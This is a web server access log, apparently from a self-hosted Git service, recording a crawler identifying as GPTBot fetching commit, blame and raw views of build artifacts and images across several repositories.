"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15621] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15647] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:17:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722314] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:17:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:17:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:17:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749428] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:17:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17061] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17059] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17035] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17059] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:17:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:17:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 9795] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:17:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPKG-00.toc" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:17:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23798] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:17:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fEXE-00.toc" [Client 74.7.227.38] [Length 23935] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:17:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23943] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:17:08:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:17:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fEXE-00.toc" [Client 74.7.227.38] [Length 23951] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:17:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23812] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:17:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23925] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:17:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23810] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:17:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPKG-00.toc" [Client 74.7.227.38] [Length 23929] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:17:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPKG-00.toc" [Client 74.7.227.38] [Length 23970] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:17:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:17:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fEXE-00.toc" [Client 74.7.227.38] [Length 23954] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:17:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 